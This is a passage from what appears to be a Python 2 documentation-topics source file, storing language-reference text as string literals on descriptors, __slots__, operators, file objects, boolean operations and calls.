assignment. This should only be implemented if "del ' 'obj.name" is\n' ' meaningful for the object.\n' '\n' '\n' 'More attribute access for new-style classes\n' '===========================================\n' '\n' 'The following methods only apply to new-style classes.\n' '\n' 'object.__getattribute__(self, name)\n' '\n' ' Called unconditionally to implement attribute ' 'accesses for\n' ' instances of the class. 
If the class also defines ' '"__getattr__()",\n' ' the latter will not be called unless ' '"__getattribute__()" either\n' ' calls it explicitly or raises an "AttributeError". ' 'This method\n' ' should return the (computed) attribute value or raise ' 'an\n' ' "AttributeError" exception. In order to avoid ' 'infinite recursion in\n' ' this method, its implementation should always call ' 'the base class\n' ' method with the same name to access any attributes it ' 'needs, for\n' ' example, "object.__getattribute__(self, name)".\n' '\n' ' Note: This method may still be bypassed when looking ' 'up special\n' ' methods as the result of implicit invocation via ' 'language syntax\n' ' or built-in functions. See Special method lookup ' 'for new-style\n' ' classes.\n' '\n' '\n' 'Implementing Descriptors\n' '========================\n' '\n' 'The following methods only apply when an instance of the ' 'class\n' 'containing the method (a so-called *descriptor* class) ' 'appears in an\n' '*owner* class (the descriptor must be in either the ' "owner's class\n" 'dictionary or in the class dictionary for one of its ' 'parents). In the\n' 'examples below, "the attribute" refers to the attribute ' 'whose name is\n' "the key of the property in the owner class' " '"__dict__".\n' '\n' 'object.__get__(self, instance, owner)\n' '\n' ' Called to get the attribute of the owner class (class ' 'attribute\n' ' access) or of an instance of that class (instance ' 'attribute\n' ' access). *owner* is always the owner class, while ' '*instance* is the\n' ' instance that the attribute was accessed through, or ' '"None" when\n' ' the attribute is accessed through the *owner*. 
This ' 'method should\n' ' return the (computed) attribute value or raise an ' '"AttributeError"\n' ' exception.\n' '\n' 'object.__set__(self, instance, value)\n' '\n' ' Called to set the attribute on an instance *instance* ' 'of the owner\n' ' class to a new value, *value*.\n' '\n' 'object.__delete__(self, instance)\n' '\n' ' Called to delete the attribute on an instance ' '*instance* of the\n' ' owner class.\n' '\n' '\n' 'Invoking Descriptors\n' '====================\n' '\n' 'In general, a descriptor is an object attribute with ' '"binding\n' 'behavior", one whose attribute access has been ' 'overridden by methods\n' 'in the descriptor protocol: "__get__()", "__set__()", ' 'and\n' '"__delete__()". If any of those methods are defined for ' 'an object, it\n' 'is said to be a descriptor.\n' '\n' 'The default behavior for attribute access is to get, ' 'set, or delete\n' "the attribute from an object's dictionary. For instance, " '"a.x" has a\n' 'lookup chain starting with "a.__dict__[\'x\']", then\n' '"type(a).__dict__[\'x\']", and continuing through the ' 'base classes of\n' '"type(a)" excluding metaclasses.\n' '\n' 'However, if the looked-up value is an object defining ' 'one of the\n' 'descriptor methods, then Python may override the default ' 'behavior and\n' 'invoke the descriptor method instead. Where this occurs ' 'in the\n' 'precedence chain depends on which descriptor methods ' 'were defined and\n' 'how they were called. Note that descriptors are only ' 'invoked for new\n' 'style objects or classes (ones that subclass "object()" ' 'or "type()").\n' '\n' 'The starting point for descriptor invocation is a ' 'binding, "a.x". 
How\n' 'the arguments are assembled depends on "a":\n' '\n' 'Direct Call\n' ' The simplest and least common call is when user code ' 'directly\n' ' invokes a descriptor method: "x.__get__(a)".\n' '\n' 'Instance Binding\n' ' If binding to a new-style object instance, "a.x" is ' 'transformed\n' ' into the call: "type(a).__dict__[\'x\'].__get__(a, ' 'type(a))".\n' '\n' 'Class Binding\n' ' If binding to a new-style class, "A.x" is transformed ' 'into the\n' ' call: "A.__dict__[\'x\'].__get__(None, A)".\n' '\n' 'Super Binding\n' ' If "a" is an instance of "super", then the binding ' '"super(B,\n' ' obj).m()" searches "obj.__class__.__mro__" for the ' 'base class "A"\n' ' immediately preceding "B" and then invokes the ' 'descriptor with the\n' ' call: "A.__dict__[\'m\'].__get__(obj, ' 'obj.__class__)".\n' '\n' 'For instance bindings, the precedence of descriptor ' 'invocation depends\n' 'on the which descriptor methods are defined. A ' 'descriptor can define\n' 'any combination of "__get__()", "__set__()" and ' '"__delete__()". If it\n' 'does not define "__get__()", then accessing the ' 'attribute will return\n' 'the descriptor object itself unless there is a value in ' "the object's\n" 'instance dictionary. If the descriptor defines ' '"__set__()" and/or\n' '"__delete__()", it is a data descriptor; if it defines ' 'neither, it is\n' 'a non-data descriptor. Normally, data descriptors ' 'define both\n' '"__get__()" and "__set__()", while non-data descriptors ' 'have just the\n' '"__get__()" method. Data descriptors with "__set__()" ' 'and "__get__()"\n' 'defined always override a redefinition in an instance ' 'dictionary. In\n' 'contrast, non-data descriptors can be overridden by ' 'instances.\n' '\n' 'Python methods (including "staticmethod()" and ' '"classmethod()") are\n' 'implemented as non-data descriptors. Accordingly, ' 'instances can\n' 'redefine and override methods. 
This allows individual ' 'instances to\n' 'acquire behaviors that differ from other instances of ' 'the same class.\n' '\n' 'The "property()" function is implemented as a data ' 'descriptor.\n' 'Accordingly, instances cannot override the behavior of a ' 'property.\n' '\n' '\n' '__slots__\n' '=========\n' '\n' 'By default, instances of both old and new-style classes ' 'have a\n' 'dictionary for attribute storage. This wastes space for ' 'objects\n' 'having very few instance variables. The space ' 'consumption can become\n' 'acute when creating large numbers of instances.\n' '\n' 'The default can be overridden by defining *__slots__* in ' 'a new-style\n' 'class definition. The *__slots__* declaration takes a ' 'sequence of\n' 'instance variables and reserves just enough space in ' 'each instance to\n' 'hold a value for each variable. Space is saved because ' '*__dict__* is\n' 'not created for each instance.\n' '\n' '__slots__\n' '\n' ' This class variable can be assigned a string, ' 'iterable, or sequence\n' ' of strings with variable names used by instances. If ' 'defined in a\n' ' new-style class, *__slots__* reserves space for the ' 'declared\n' ' variables and prevents the automatic creation of ' '*__dict__* and\n' ' *__weakref__* for each instance.\n' '\n' ' New in version 2.2.\n' '\n' 'Notes on using *__slots__*\n' '\n' '* When inheriting from a class without *__slots__*, the ' '*__dict__*\n' ' attribute of that class will always be accessible, so ' 'a *__slots__*\n' ' definition in the subclass is meaningless.\n' '\n' '* Without a *__dict__* variable, instances cannot be ' 'assigned new\n' ' variables not listed in the *__slots__* definition. ' 'Attempts to\n' ' assign to an unlisted variable name raises ' '"AttributeError". 
If\n' ' dynamic assignment of new variables is desired, then ' 'add\n' ' "\'__dict__\'" to the sequence of strings in the ' '*__slots__*\n' ' declaration.\n' '\n' ' Changed in version 2.3: Previously, adding ' '"\'__dict__\'" to the\n' ' *__slots__* declaration would not enable the ' 'assignment of new\n' ' attributes not specifically listed in the sequence of ' 'instance\n' ' variable names.\n' '\n' '* Without a *__weakref__* variable for each instance, ' 'classes\n' ' defining *__slots__* do not support weak references to ' 'its\n' ' instances. If weak reference support is needed, then ' 'add\n' ' "\'__weakref__\'" to the sequence of strings in the ' '*__slots__*\n' ' declaration.\n' '\n' ' Changed in version 2.3: Previously, adding ' '"\'__weakref__\'" to the\n' ' *__slots__* declaration would not enable support for ' 'weak\n' ' references.\n' '\n' '* *__slots__* are implemented at the class level by ' 'creating\n' ' descriptors (Implementing Descriptors) for each ' 'variable name. As a\n' ' result, class attributes cannot be used to set default ' 'values for\n' ' instance variables defined by *__slots__*; otherwise, ' 'the class\n' ' attribute would overwrite the descriptor assignment.\n' '\n' '* The action of a *__slots__* declaration is limited to ' 'the class\n' ' where it is defined. As a result, subclasses will ' 'have a *__dict__*\n' ' unless they also define *__slots__* (which must only ' 'contain names\n' ' of any *additional* slots).\n' '\n' '* If a class defines a slot also defined in a base ' 'class, the\n' ' instance variable defined by the base class slot is ' 'inaccessible\n' ' (except by retrieving its descriptor directly from the ' 'base class).\n' ' This renders the meaning of the program undefined. 
In ' 'the future, a\n' ' check may be added to prevent this.\n' '\n' '* Nonempty *__slots__* does not work for classes derived ' 'from\n' ' "variable-length" built-in types such as "long", "str" ' 'and "tuple".\n' '\n' '* Any non-string iterable may be assigned to ' '*__slots__*. Mappings\n' ' may also be used; however, in the future, special ' 'meaning may be\n' ' assigned to the values corresponding to each key.\n' '\n' '* *__class__* assignment works only if both classes have ' 'the same\n' ' *__slots__*.\n' '\n' ' Changed in version 2.6: Previously, *__class__* ' 'assignment raised an\n' ' error if either new or old class had *__slots__*.\n', 'attribute-references': '\n' 'Attribute references\n' '********************\n' '\n' 'An attribute reference is a primary followed by a ' 'period and a name:\n' '\n' ' attributeref ::= primary "." identifier\n' '\n' 'The primary must evaluate to an object of a type ' 'that supports\n' 'attribute references, e.g., a module, list, or an ' 'instance. This\n' 'object is then asked to produce the attribute whose ' 'name is the\n' 'identifier. If this attribute is not available, the ' 'exception\n' '"AttributeError" is raised. Otherwise, the type and ' 'value of the\n' 'object produced is determined by the object. 
' 'Multiple evaluations of\n' 'the same attribute reference may yield different ' 'objects.\n', 'augassign': '\n' 'Augmented assignment statements\n' '*******************************\n' '\n' 'Augmented assignment is the combination, in a single statement, ' 'of a\n' 'binary operation and an assignment statement:\n' '\n' ' augmented_assignment_stmt ::= augtarget augop ' '(expression_list | yield_expression)\n' ' augtarget ::= identifier | attributeref | ' 'subscription | slicing\n' ' augop ::= "+=" | "-=" | "*=" | "/=" | ' '"//=" | "%=" | "**="\n' ' | ">>=" | "<<=" | "&=" | "^=" | "|="\n' '\n' '(See section Primaries for the syntax definitions for the last ' 'three\n' 'symbols.)\n' '\n' 'An augmented assignment evaluates the target (which, unlike ' 'normal\n' 'assignment statements, cannot be an unpacking) and the ' 'expression\n' 'list, performs the binary operation specific to the type of ' 'assignment\n' 'on the two operands, and assigns the result to the original ' 'target.\n' 'The target is only evaluated once.\n' '\n' 'An augmented assignment expression like "x += 1" can be ' 'rewritten as\n' '"x = x + 1" to achieve a similar, but not exactly equal effect. ' 'In the\n' 'augmented version, "x" is only evaluated once. Also, when ' 'possible,\n' 'the actual operation is performed *in-place*, meaning that ' 'rather than\n' 'creating a new object and assigning that to the target, the old ' 'object\n' 'is modified instead.\n' '\n' 'With the exception of assigning to tuples and multiple targets ' 'in a\n' 'single statement, the assignment done by augmented assignment\n' 'statements is handled the same way as normal assignments. 
' 'Similarly,\n' 'with the exception of the possible *in-place* behavior, the ' 'binary\n' 'operation performed by augmented assignment is the same as the ' 'normal\n' 'binary operations.\n' '\n' 'For targets which are attribute references, the same caveat ' 'about\n' 'class and instance attributes applies as for regular ' 'assignments.\n', 'binary': '\n' 'Binary arithmetic operations\n' '****************************\n' '\n' 'The binary arithmetic operations have the conventional priority\n' 'levels. Note that some of these operations also apply to certain ' 'non-\n' 'numeric types. Apart from the power operator, there are only two\n' 'levels, one for multiplicative operators and one for additive\n' 'operators:\n' '\n' ' m_expr ::= u_expr | m_expr "*" u_expr | m_expr "//" u_expr | ' 'm_expr "/" u_expr\n' ' | m_expr "%" u_expr\n' ' a_expr ::= m_expr | a_expr "+" m_expr | a_expr "-" m_expr\n' '\n' 'The "*" (multiplication) operator yields the product of its ' 'arguments.\n' 'The arguments must either both be numbers, or one argument must be ' 'an\n' 'integer (plain or long) and the other must be a sequence. In the\n' 'former case, the numbers are converted to a common type and then\n' 'multiplied together. In the latter case, sequence repetition is\n' 'performed; a negative repetition factor yields an empty sequence.\n' '\n' 'The "/" (division) and "//" (floor division) operators yield the\n' 'quotient of their arguments. The numeric arguments are first\n' 'converted to a common type. Plain or long integer division yields ' 'an\n' 'integer of the same type; the result is that of mathematical ' 'division\n' "with the 'floor' function applied to the result. Division by zero\n" 'raises the "ZeroDivisionError" exception.\n' '\n' 'The "%" (modulo) operator yields the remainder from the division ' 'of\n' 'the first argument by the second. The numeric arguments are ' 'first\n' 'converted to a common type. A zero right argument raises the\n' '"ZeroDivisionError" exception. 
The arguments may be floating ' 'point\n' 'numbers, e.g., "3.14%0.7" equals "0.34" (since "3.14" equals ' '"4*0.7 +\n' '0.34".) The modulo operator always yields a result with the same ' 'sign\n' 'as its second operand (or zero); the absolute value of the result ' 'is\n' 'strictly smaller than the absolute value of the second operand ' '[2].\n' '\n' 'The integer division and modulo operators are connected by the\n' 'following identity: "x == (x/y)*y + (x%y)". Integer division and\n' 'modulo are also connected with the built-in function "divmod()":\n' '"divmod(x, y) == (x/y, x%y)". These identities don\'t hold for\n' 'floating point numbers; there similar identities hold ' 'approximately\n' 'where "x/y" is replaced by "floor(x/y)" or "floor(x/y) - 1" [3].\n' '\n' 'In addition to performing the modulo operation on numbers, the ' '"%"\n' 'operator is also overloaded by string and unicode objects to ' 'perform\n' 'string formatting (also known as interpolation). The syntax for ' 'string\n' 'formatting is described in the Python Library Reference, section\n' 'String Formatting Operations.\n' '\n' 'Deprecated since version 2.3: The floor division operator, the ' 'modulo\n' 'operator, and the "divmod()" function are no longer defined for\n' 'complex numbers. Instead, convert to a floating point number ' 'using\n' 'the "abs()" function if appropriate.\n' '\n' 'The "+" (addition) operator yields the sum of its arguments. The\n' 'arguments must either both be numbers or both sequences of the ' 'same\n' 'type. In the former case, the numbers are converted to a common ' 'type\n' 'and then added together. 
In the latter case, the sequences are\n' 'concatenated.\n' '\n' 'The "-" (subtraction) operator yields the difference of its ' 'arguments.\n' 'The numeric arguments are first converted to a common type.\n', 'bitwise': '\n' 'Binary bitwise operations\n' '*************************\n' '\n' 'Each of the three bitwise operations has a different priority ' 'level:\n' '\n' ' and_expr ::= shift_expr | and_expr "&" shift_expr\n' ' xor_expr ::= and_expr | xor_expr "^" and_expr\n' ' or_expr ::= xor_expr | or_expr "|" xor_expr\n' '\n' 'The "&" operator yields the bitwise AND of its arguments, which ' 'must\n' 'be plain or long integers. The arguments are converted to a ' 'common\n' 'type.\n' '\n' 'The "^" operator yields the bitwise XOR (exclusive OR) of its\n' 'arguments, which must be plain or long integers. The arguments ' 'are\n' 'converted to a common type.\n' '\n' 'The "|" operator yields the bitwise (inclusive) OR of its ' 'arguments,\n' 'which must be plain or long integers. The arguments are ' 'converted to\n' 'a common type.\n', 'bltin-code-objects': '\n' 'Code Objects\n' '************\n' '\n' 'Code objects are used by the implementation to ' 'represent "pseudo-\n' 'compiled" executable Python code such as a function ' 'body. They differ\n' "from function objects because they don't contain a " 'reference to their\n' 'global execution environment. Code objects are ' 'returned by the built-\n' 'in "compile()" function and can be extracted from ' 'function objects\n' 'through their "func_code" attribute. See also the ' '"code" module.\n' '\n' 'A code object can be executed or evaluated by passing ' 'it (instead of a\n' 'source string) to the "exec" statement or the built-in ' '"eval()"\n' 'function.\n' '\n' 'See The standard type hierarchy for more ' 'information.\n', 'bltin-ellipsis-object': '\n' 'The Ellipsis Object\n' '*******************\n' '\n' 'This object is used by extended slice notation (see ' 'Slicings). It\n' 'supports no special operations. 
There is exactly ' 'one ellipsis object,\n' 'named "Ellipsis" (a built-in name).\n' '\n' 'It is written as "Ellipsis". When in a subscript, ' 'it can also be\n' 'written as "...", for example "seq[...]".\n', 'bltin-file-objects': '\n' 'File Objects\n' '************\n' '\n' 'File objects are implemented using C\'s "stdio" ' 'package and can be\n' 'created with the built-in "open()" function. File ' 'objects are also\n' 'returned by some other built-in functions and methods, ' 'such as\n' '"os.popen()" and "os.fdopen()" and the "makefile()" ' 'method of socket\n' 'objects. Temporary files can be created using the ' '"tempfile" module,\n' 'and high-level file operations such as copying, ' 'moving, and deleting\n' 'files and directories can be achieved with the ' '"shutil" module.\n' '\n' 'When a file operation fails for an I/O-related reason, ' 'the exception\n' '"IOError" is raised. This includes situations where ' 'the operation is\n' 'not defined for some reason, like "seek()" on a tty ' 'device or writing\n' 'a file opened for reading.\n' '\n' 'Files have the following methods:\n' '\n' 'file.close()\n' '\n' ' Close the file. A closed file cannot be read or ' 'written any more.\n' ' Any operation which requires that the file be open ' 'will raise a\n' ' "ValueError" after the file has been closed. ' 'Calling "close()"\n' ' more than once is allowed.\n' '\n' ' As of Python 2.5, you can avoid having to call this ' 'method\n' ' explicitly if you use the "with" statement. 
For ' 'example, the\n' ' following code will automatically close *f* when ' 'the "with" block\n' ' is exited:\n' '\n' ' from __future__ import with_statement # This ' "isn't required in Python 2.6\n" '\n' ' with open("hello.txt") as f:\n' ' for line in f:\n' ' print line,\n' '\n' ' In older versions of Python, you would have needed ' 'to do this to\n' ' get the same effect:\n' '\n' ' f = open("hello.txt")\n' ' try:\n' ' for line in f:\n' ' print line,\n' ' finally:\n' ' f.close()\n' '\n' ' Note: Not all "file-like" types in Python support ' 'use as a\n' ' context manager for the "with" statement. If ' 'your code is\n' ' intended to work with any file-like object, you ' 'can use the\n' ' function "contextlib.closing()" instead of using ' 'the object\n' ' directly.\n' '\n' 'file.flush()\n' '\n' ' Flush the internal buffer, like "stdio"\'s ' '"fflush()". This may be\n' ' a no-op on some file-like objects.\n' '\n' ' Note: "flush()" does not necessarily write the ' "file's data to\n" ' disk. Use "flush()" followed by "os.fsync()" to ' 'ensure this\n' ' behavior.\n' '\n' 'file.fileno()\n' '\n' ' Return the integer "file descriptor" that is used ' 'by the underlying\n' ' implementation to request I/O operations from the ' 'operating system.\n' ' This can be useful for other, lower level ' 'interfaces that use file\n' ' descriptors, such as the "fcntl" module or ' '"os.read()" and friends.\n' '\n' ' Note: File-like objects which do not have a real ' 'file descriptor\n' ' should *not* provide this method!\n' '\n' 'file.isatty()\n' '\n' ' Return "True" if the file is connected to a ' 'tty(-like) device, else\n' ' "False".\n' '\n' ' Note: If a file-like object is not associated with ' 'a real file,\n' ' this method should *not* be implemented.\n' '\n' 'file.next()\n' '\n' ' A file object is its own iterator, for example ' '"iter(f)" returns\n' ' *f* (unless *f* is closed). 
When a file is used as ' 'an iterator,\n' ' typically in a "for" loop (for example, "for line ' 'in f: print\n' ' line.strip()"), the "next()" method is called ' 'repeatedly. This\n' ' method returns the next input line, or raises ' '"StopIteration" when\n' ' EOF is hit when the file is open for reading ' '(behavior is undefined\n' ' when the file is open for writing). In order to ' 'make a "for" loop\n' ' the most efficient way of looping over the lines of ' 'a file (a very\n' ' common operation), the "next()" method uses a ' 'hidden read-ahead\n' ' buffer. As a consequence of using a read-ahead ' 'buffer, combining\n' ' "next()" with other file methods (like ' '"readline()") does not work\n' ' right. However, using "seek()" to reposition the ' 'file to an\n' ' absolute position will flush the read-ahead ' 'buffer.\n' '\n' ' New in version 2.3.\n' '\n' 'file.read([size])\n' '\n' ' Read at most *size* bytes from the file (less if ' 'the read hits EOF\n' ' before obtaining *size* bytes). If the *size* ' 'argument is negative\n' ' or omitted, read all data until EOF is reached. ' 'The bytes are\n' ' returned as a string object. An empty string is ' 'returned when EOF\n' ' is encountered immediately. (For certain files, ' 'like ttys, it\n' ' makes sense to continue reading after an EOF is ' 'hit.) Note that\n' ' this method may call the underlying C function ' '"fread()" more than\n' ' once in an effort to acquire as close to *size* ' 'bytes as possible.\n' ' Also note that when in non-blocking mode, less data ' 'than was\n' ' requested may be returned, even if no *size* ' 'parameter was given.\n' '\n' ' Note: This function is simply a wrapper for the ' 'underlying\n' ' "fread()" C function, and will behave the same in ' 'corner cases,\n' ' such as whether the EOF value is cached.\n' '\n' 'file.readline([size])\n' '\n' ' Read one entire line from the file. 
A trailing ' 'newline character\n' ' is kept in the string (but may be absent when a ' 'file ends with an\n' ' incomplete line). [6] If the *size* argument is ' 'present and non-\n' ' negative, it is a maximum byte count (including the ' 'trailing\n' ' newline) and an incomplete line may be returned. ' 'When *size* is not\n' ' 0, an empty string is returned *only* when EOF is ' 'encountered\n' ' immediately.\n' '\n' ' Note: Unlike "stdio"\'s "fgets()", the returned ' 'string contains\n' ' null characters ("\'\\0\'") if they occurred in ' 'the input.\n' '\n' 'file.readlines([sizehint])\n' '\n' ' Read until EOF using "readline()" and return a list ' 'containing the\n' ' lines thus read. If the optional *sizehint* ' 'argument is present,\n' ' instead of reading up to EOF, whole lines totalling ' 'approximately\n' ' *sizehint* bytes (possibly after rounding up to an ' 'internal buffer\n' ' size) are read. Objects implementing a file-like ' 'interface may\n' ' choose to ignore *sizehint* if it cannot be ' 'implemented, or cannot\n' ' be implemented efficiently.\n' '\n' 'file.xreadlines()\n' '\n' ' This method returns the same thing as "iter(f)".\n' '\n' ' New in version 2.1.\n' '\n' ' Deprecated since version 2.3: Use "for line in ' 'file" instead.\n' '\n' 'file.seek(offset[, whence])\n' '\n' ' Set the file\'s current position, like "stdio"\'s ' '"fseek()". The\n' ' *whence* argument is optional and defaults to ' '"os.SEEK_SET" or "0"\n' ' (absolute file positioning); other values are ' '"os.SEEK_CUR" or "1"\n' ' (seek relative to the current position) and ' '"os.SEEK_END" or "2"\n' " (seek relative to the file's end). 
There is no " 'return value.\n' '\n' ' For example, "f.seek(2, os.SEEK_CUR)" advances the ' 'position by two\n' ' and "f.seek(-3, os.SEEK_END)" sets the position to ' 'the third to\n' ' last.\n' '\n' ' Note that if the file is opened for appending (mode ' '"\'a\'" or\n' ' "\'a+\'"), any "seek()" operations will be undone ' 'at the next write.\n' ' If the file is only opened for writing in append ' 'mode (mode "\'a\'"),\n' ' this method is essentially a no-op, but it remains ' 'useful for files\n' ' opened in append mode with reading enabled (mode ' '"\'a+\'"). If the\n' ' file is opened in text mode (without "\'b\'"), only ' 'offsets returned\n' ' by "tell()" are legal. Use of other offsets causes ' 'undefined\n' ' behavior.\n' '\n' ' Note that not all file objects are seekable.\n' '\n' ' Changed in version 2.6: Passing float values as ' 'offset has been\n' ' deprecated.\n' '\n' 'file.tell()\n' '\n' " Return the file's current position, like " '"stdio"\'s "ftell()".\n' '\n' ' Note: On Windows, "tell()" can return illegal ' 'values (after an\n' ' "fgets()") when reading files with Unix-style ' 'line-endings. Use\n' ' binary mode ("\'rb\'") to circumvent this ' 'problem.\n' '\n' 'file.truncate([size])\n' '\n' " Truncate the file's size. If the optional *size* " 'argument is\n' ' present, the file is truncated to (at most) that ' 'size. The size\n' ' defaults to the current position. The current file ' 'position is not\n' ' changed. Note that if a specified size exceeds the ' "file's current\n" ' size, the result is platform-dependent: ' 'possibilities include that\n' ' the file may remain unchanged, increase to the ' 'specified size as if\n' ' zero-filled, or increase to the specified size with ' 'undefined new\n' ' content. Availability: Windows, many Unix ' 'variants.\n' '\n' 'file.write(str)\n' '\n' ' Write a string to the file. There is no return ' 'value. 
Due to\n' ' buffering, the string may not actually show up in ' 'the file until\n' ' the "flush()" or "close()" method is called.\n' '\n' 'file.writelines(sequence)\n' '\n' ' Write a sequence of strings to the file. The ' 'sequence can be any\n' ' iterable object producing strings, typically a list ' 'of strings.\n' ' There is no return value. (The name is intended to ' 'match\n' ' "readlines()"; "writelines()" does not add line ' 'separators.)\n' '\n' 'Files support the iterator protocol. Each iteration ' 'returns the same\n' 'result as "readline()", and iteration ends when the ' '"readline()"\n' 'method returns an empty string.\n' '\n' 'File objects also offer a number of other interesting ' 'attributes.\n' 'These are not required for file-like objects, but ' 'should be\n' 'implemented if they make sense for the particular ' 'object.\n' '\n' 'file.closed\n' '\n' ' bool indicating the current state of the file ' 'object. This is a\n' ' read-only attribute; the "close()" method changes ' 'the value. It may\n' ' not be available on all file-like objects.\n' '\n' 'file.encoding\n' '\n' ' The encoding that this file uses. When Unicode ' 'strings are written\n' ' to a file, they will be converted to byte strings ' 'using this\n' ' encoding. In addition, when the file is connected ' 'to a terminal,\n' ' the attribute gives the encoding that the terminal ' 'is likely to use\n' ' (that information might be incorrect if the user ' 'has misconfigured\n' ' the terminal). The attribute is read-only and may ' 'not be present\n' ' on all file-like objects. It may also be "None", in ' 'which case the\n' ' file uses the system default encoding for ' 'converting Unicode\n' ' strings.\n' '\n' ' New in version 2.3.\n' '\n' 'file.errors\n' '\n' ' The Unicode error handler used along with the ' 'encoding.\n' '\n' ' New in version 2.6.\n' '\n' 'file.mode\n' '\n' ' The I/O mode for the file. 
If the file was created ' 'using the\n' ' "open()" built-in function, this will be the value ' 'of the *mode*\n' ' parameter. This is a read-only attribute and may ' 'not be present on\n' ' all file-like objects.\n' '\n' 'file.name\n' '\n' ' If the file object was created using "open()", the ' 'name of the\n' ' file. Otherwise, some string that indicates the ' 'source of the file\n' ' object, of the form "<...>". This is a read-only ' 'attribute and may\n' ' not be present on all file-like objects.\n' '\n' 'file.newlines\n' '\n' ' If Python was built with *universal newlines* ' 'enabled (the default)\n' ' this read-only attribute exists, and for files ' 'opened in universal\n' ' newline read mode it keeps track of the types of ' 'newlines\n' ' encountered while reading the file. The values it ' 'can take are\n' ' "\'\\r\'", "\'\\n\'", "\'\\r\\n\'", "None" ' '(unknown, no newlines read yet) or\n' ' a tuple containing all the newline types seen, to ' 'indicate that\n' ' multiple newline conventions were encountered. For ' 'files not opened\n' ' in universal newlines read mode the value of this ' 'attribute will be\n' ' "None".\n' '\n' 'file.softspace\n' '\n' ' Boolean that indicates whether a space character ' 'needs to be\n' ' printed before another value when using the "print" ' 'statement.\n' ' Classes that are trying to simulate a file object ' 'should also have\n' ' a writable "softspace" attribute, which should be ' 'initialized to\n' ' zero. 
This will be automatic for most classes ' 'implemented in\n' ' Python (care may be needed for objects that ' 'override attribute\n' ' access); types implemented in C will have to ' 'provide a writable\n' ' "softspace" attribute.\n' '\n' ' Note: This attribute is not used to control the ' '"print"\n' ' statement, but to allow the implementation of ' '"print" to keep\n' ' track of its internal state.\n', 'bltin-null-object': '\n' 'The Null Object\n' '***************\n' '\n' "This object is returned by functions that don't " 'explicitly return a\n' 'value. It supports no special operations. There is ' 'exactly one null\n' 'object, named "None" (a built-in name).\n' '\n' 'It is written as "None".\n', 'bltin-type-objects': '\n' 'Type Objects\n' '************\n' '\n' 'Type objects represent the various object types. An ' "object's type is\n" 'accessed by the built-in function "type()". There are ' 'no special\n' 'operations on types. The standard module "types" ' 'defines names for\n' 'all standard built-in types.\n' '\n' 'Types are written like this: "<type \'int\'>".\n', 'booleans': '\n' 'Boolean operations\n' '******************\n' '\n' ' or_test ::= and_test | or_test "or" and_test\n' ' and_test ::= not_test | and_test "and" not_test\n' ' not_test ::= comparison | "not" not_test\n' '\n' 'In the context of Boolean operations, and also when expressions ' 'are\n' 'used by control flow statements, the following values are ' 'interpreted\n' 'as false: "False", "None", numeric zero of all types, and empty\n' 'strings and containers (including strings, tuples, lists,\n' 'dictionaries, sets and frozensets). All other values are ' 'interpreted\n' 'as true. 
(See the "__nonzero__()" special method for a way to ' 'change\n' 'this.)\n' '\n' 'The operator "not" yields "True" if its argument is false, ' '"False"\n' 'otherwise.\n' '\n' 'The expression "x and y" first evaluates *x*; if *x* is false, ' 'its\n' 'value is returned; otherwise, *y* is evaluated and the resulting ' 'value\n' 'is returned.\n' '\n' 'The expression "x or y" first evaluates *x*; if *x* is true, its ' 'value\n' 'is returned; otherwise, *y* is evaluated and the resulting value ' 'is\n' 'returned.\n' '\n' '(Note that neither "and" nor "or" restrict the value and type ' 'they\n' 'return to "False" and "True", but rather return the last ' 'evaluated\n' 'argument. This is sometimes useful, e.g., if "s" is a string ' 'that\n' 'should be replaced by a default value if it is empty, the ' 'expression\n' '"s or \'foo\'" yields the desired value. Because "not" has to ' 'invent a\n' 'value anyway, it does not bother to return a value of the same ' 'type as\n' 'its argument, so e.g., "not \'foo\'" yields "False", not ' '"\'\'".)\n', 'break': '\n' 'The "break" statement\n' '*********************\n' '\n' ' break_stmt ::= "break"\n' '\n' '"break" may only occur syntactically nested in a "for" or "while"\n' 'loop, but not nested in a function or class definition within that\n' 'loop.\n' '\n' 'It terminates the nearest enclosing loop, skipping the optional ' '"else"\n' 'clause if the loop has one.\n' '\n' 'If a "for" loop is terminated by "break", the loop control target\n' 'keeps its current value.\n' '\n' 'When "break" passes control out of a "try" statement with a ' '"finally"\n' 'clause, that "finally" clause is executed before really leaving ' 'the\n' 'loop.\n', 'callable-types': '\n' 'Emulating callable objects\n' '**************************\n' '\n' 'object.__call__(self[, args...])\n' '\n' ' Called when the instance is "called" as a function; if ' 'this method\n' ' is defined, "x(arg1, arg2, ...)" is a shorthand for\n' ' "x.__call__(arg1, arg2, ...)".\n', 
'calls': '\n' 'Calls\n' '*****\n' '\n' 'A call calls a callable object (e.g., a *function*) with a ' 'possibly\n' 'empty series of *arguments*:\n' '\n' ' call ::= primary "(" [argument_list [","]\n' ' | expression genexpr_for] ")"\n' ' argument_list ::= positional_arguments ["," ' 'keyword_arguments]\n' ' ["," "*" expression] ["," ' 'keyword_arguments]\n' ' ["," "**" expression]\n' ' | keyword_arguments ["," "*" expression]\n' ' ["," "**" expression]\n' ' | "*" expression ["," keyword_arguments] ["," ' '"**" expression]\n' ' | "**" expression\n' ' positional_arguments ::= expression ("," expression)*\n' ' keyword_arguments ::= keyword_item ("," keyword_item)*\n' ' keyword_item ::= identifier "=" expression\n' '\n' 'A trailing comma may be present after the positional and keyword\n' 'arguments but does not affect the semantics.\n' '\n' 'The primary must evaluate to a callable object (user-defined\n' 'functions, built-in functions, methods of built-in objects, class\n' 'objects, methods of class instances, and certain class instances\n' 'themselves are callable; extensions may define additional callable\n' 'object types). All argument expressions are evaluated before the ' 'call\n' 'is attempted. Please refer to section Function definitions for ' 'the\n' 'syntax of formal *parameter* lists.\n' '\n' 'If keyword arguments are present, they are first converted to\n' 'positional arguments, as follows. First, a list of unfilled slots ' 'is\n' 'created for the formal parameters. If there are N positional\n' 'arguments, they are placed in the first N slots. Next, for each\n' 'keyword argument, the identifier is used to determine the\n' 'corresponding slot (if the identifier is the same as the first ' 'formal\n' 'parameter name, the first slot is used, and so on). If the slot ' 'is\n' 'already filled, a "TypeError" exception is raised. Otherwise, the\n' 'value of the argument is placed in the slot, filling it (even if ' 'the\n' 'expression is "None", it fills the slot). 
